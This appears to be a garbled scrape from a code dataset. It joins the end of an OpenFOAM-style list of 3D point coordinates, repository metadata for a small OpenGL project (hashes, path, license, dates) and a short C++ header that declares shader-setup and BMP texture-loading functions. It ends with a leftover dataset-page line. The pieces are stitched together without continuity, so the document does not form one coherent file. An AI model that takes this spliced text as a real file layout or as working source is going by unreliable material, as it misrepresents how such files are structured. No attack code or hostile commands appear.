(0.07819 0 1.52562)
(0.110878 0 1.52486)
(0.14355 0 1.52322)
(0.0785561 0 1.59953)
(0.111391 0 1.5989)
(0.144187 0 1.59762)
(0.0787424 0 1.67554)
(0.111676 0 1.67501)
(0.144564 0 1.67397)
(0.0787757 0 1.75362)
(0.11178 0 1.75316)
(0.144736 0 1.7523)
(0.0786756 0 1.83373)
(0.111732 0 1.83334)
(0.144739 0 1.83261)
(0.207001 0.3 1.21632)
(0.280426 0.3 1.19727)
(0.35446 0.3 1.18216)
(0.42922 0.3 1.17082)
(0.505016 0.3 1.16243)
(0.582123 0.3 1.1561)
(0.660738 0.3 1.15115)
(0.740988 0.3 1.14709)
(0.822959 0.3 1.14361)
(0.207335 0.3 1.29827)
(0.278859 0.3 1.28385)
(0.352262 0.3 1.26987)
(0.427051 0.3 1.25766)
(0.503115 0.3 1.24757)
(0.580524 0.3 1.23942)
(0.659402 0.3 1.23281)
(0.739861 0.3 1.22733)
(0.821995 0.3 1.22267)
(0.208779 0.3 1.3726)
(0.279135 0.3 1.36228)
(0.351668 0.3 1.35117)
(0.425985 0.3 1.34038)
(0.501885 0.3 1.33054)
(0.579306 0.3 1.32192)
(0.65827 0.3 1.31451)
(0.738837 0.3 1.30815)
(0.821073 0.3 1.30263)
(0.210063 0.3 1.44574)
(0.279836 0.3 1.43821)
(0.351761 0.3 1.42954)
(0.425605 0.3 1.42051)
(0.501203 0.3 1.41171)
(0.57847 0.3 1.40351)
(0.657382 0.3 1.39605)
(0.737955 0.3 1.38936)
(0.820227 0.3 1.38338)
(0.21103 0.3 1.51959)
(0.280527 0.3 1.51392)
(0.352072 0.3 1.50711)
(0.425549 0.3 1.49967)
(0.500857 0.3 1.49204)
(0.577922 0.3 1.48457)
(0.656712 0.3 1.47749)
(0.737223 0.3 1.4709)
(0.819473 0.3 1.4648)
(0.211702 0.3 1.59483)
(0.281075 0.3 1.59043)
(0.352393 0.3 1.58499)
(0.425612 0.3 1.57885)
(0.500679 0.3 1.57232)
(0.57755 0.3 1.56568)
(0.656197 0.3 1.55915)
(0.736613 0.3 1.55286)
(0.818804 0.3 1.54689)
(0.212127 0.3 1.67175)
(0.281449 0.3 1.66824)
(0.352634 0.3 1.66382)
(0.425678 0.3 1.65871)
(0.500561 0.3 1.65313)
(0.577265 0.3 1.64729)
(0.655774 0.3 1.64137)
(0.736083 0.3 1.6355)
(0.818199 0.3 1.62979)
(0.212346 0.3 1.75048)
(0.281653 0.3 1.74761)
(0.352762 0.3 1.74396)
(0.425688 0.3 1.73967)
(0.500436 0.3 1.73488)
(0.577004 0.3 1.72976)
(0.65539 0.3 1.72444)
(0.735597 0.3 1.71904)
(0.817631 0.3 1.71366)
(0.21239 0.3 1.83109)
(0.281699 0.3 1.8287)
(0.352764 0.3 1.82564)
(0.425612 0.3 1.82199)
(0.500262 0.3 1.81786)
(0.576724 0.3 1.81336)
(0.655007 0.3 1.8086)
(0.735121 0.3 1.80367)
(0.817075 0.3 1.79866)
(0.212285 0.3 1.91363)
(0.281602 0.3 1.91161)
(0.352643 0.3 1.90901)
(0.42544 0.3 1.90587)
(0.500018 0.3 1.90228)
(0.576399 0.3 1.89831)
(0.654597 0.3 1.89405)
(0.73463 0.3 1.88957)
(0.816512 0.3 1.88494)
(0.425167 0.3 1.99145)
(0.499694 0.3 1.9883)
(0.576011 0.3 1.98478)
(0.654142 0.3 1.98095)
(0.734106 0.3 1.97688)
(0.815924 0.3 1.97262)
(0.575555 0.3 2.07289)
(0.653631 0.3 2.06945)
(0.733538 0.3 2.06574)
(0.815301 0.3 2.06182)
(0.73292 0.3 2.15626)
(0.814635 0.3 2.15265)
(0.207001 0 1.21632)
(0.280426 0 1.19727)
(0.35446 0 1.18216)
(0.42922 0 1.17082)
(0.505016 0 1.16243)
(0.582123 0 1.1561)
(0.660738 0 1.15115)
(0.740988 0 1.14709)
(0.822959 0 1.14361)
(0.207335 0 1.29827)
(0.278859 0 1.28385)
(0.352262 0 1.26987)
(0.427051 0 1.25766)
(0.503115 0 1.24757)
(0.580524 0 1.23942)
(0.659402 0 1.23281)
(0.739861 0 1.22733)
(0.821995 0 1.22267)
(0.208779 0 1.3726)
(0.279135 0 1.36228)
(0.351668 0 1.35117)
(0.425985 0 1.34038)
(0.501885 0 1.33054)
(0.579306 0 1.32192)
(0.65827 0 1.31451)
(0.738837 0 1.30815)
(0.821073 0 1.30263)
(0.210063 0 1.44574)
(0.279836 0 1.43821)
(0.351761 0 1.42954)
(0.425605 0 1.42051)
(0.501203 0 1.41171)
(0.57847 0 1.40351)
(0.657382 0 1.39605)
(0.737955 0 1.38936)
(0.820227 0 1.38338)
(0.21103 0 1.51959)
(0.280527 0 1.51392)
(0.352072 0 1.50711)
(0.425549 0 1.49967)
(0.500857 0 1.49204)
(0.577922 0 1.48457)
(0.656712 0 1.47749)
(0.737223 0 1.4709)
(0.819473 0 1.4648)
(0.211702 0 1.59483)
(0.281075 0 1.59043)
(0.352393 0 1.58499)
(0.425612 0 1.57885)
(0.500679 0 1.57232)
(0.57755 0 1.56568)
(0.656197 0 1.55915)
(0.736613 0 1.55286)
(0.818804 0 1.54689)
(0.212127 0 1.67175)
(0.281449 0 1.66824)
(0.352634 0 1.66382)
(0.425678 0 1.65871)
(0.500561 0 1.65313)
(0.577265 0 1.64729)
(0.655774 0 1.64137)
(0.736083 0 1.6355)
(0.818199 0 1.62979)
(0.212346 0 1.75048)
(0.281653 0 1.74761)
(0.352762 0 1.74396)
(0.425688 0 1.73967)
(0.500436 0 1.73488)
(0.577004 0 1.72976)
(0.65539 0 1.72444)
(0.735597 0 1.71904)
(0.817631 0 1.71366)
(0.21239 0 1.83109)
(0.281699 0 1.8287)
(0.352764 0 1.82564)
(0.425612 0 1.82199)
(0.500262 0 1.81786)
(0.576724 0 1.81336)
(0.655007 0 1.8086)
(0.735121 0 1.80367)
(0.817075 0 1.79866)
(0.212285 0 1.91363)
(0.281602 0 1.91161)
(0.352643 0 1.90901)
(0.42544 0 1.90587)
(0.500018 0 1.90228)
(0.576399 0 1.89831)
(0.654597 0 1.89405)
(0.73463 0 1.88957)
(0.816512 0 1.88494)
(0.425167 0 1.99145)
(0.499694 0 1.9883)
(0.576011 0 1.98478)
(0.654142 0 1.98095)
(0.734106 0 1.97688)
(0.815924 0 1.97262)
(0.575555 0 2.07289)
(0.653631 0 2.06945)
(0.733538 0 2.06574)
(0.815301 0 2.06182)
(0.73292 0 2.15626)
(0.814635 0 2.15265)
)
// ************************************************************************* //
|
|
b3f0fa66e762ba01d615e3a0faf276a059b24f42
|
0b4749108f92f838d2677c1cde469e0654aee15b
|
/shadersLoaders.hpp
|
cf5eda6123fbbe1a3540ac7c52aced4acefcaeaa
|
[] |
no_license
|
wemstar/ProjektGrafika3D
|
b0b0a48ce06e4b0323c26961d43438c80787541d
|
77f2f51c9a5c15898af0573e028e8f0ff0c3bce1
|
refs/heads/master
| 2020-05-20T12:17:42.585989
| 2014-12-09T23:02:54
| 2014-12-09T23:02:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 212
|
hpp
|
shadersLoaders.hpp
|
#pragma once
#include "glew.h"
#include <GL/freeglut.h>
#include <vector>
#include "SOIL.h"
extern GLuint v,f,p,w,pv,pf;
void setShaders();
void check_error(GLuint shader);
GLuint loadBMP(const char * filename);
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.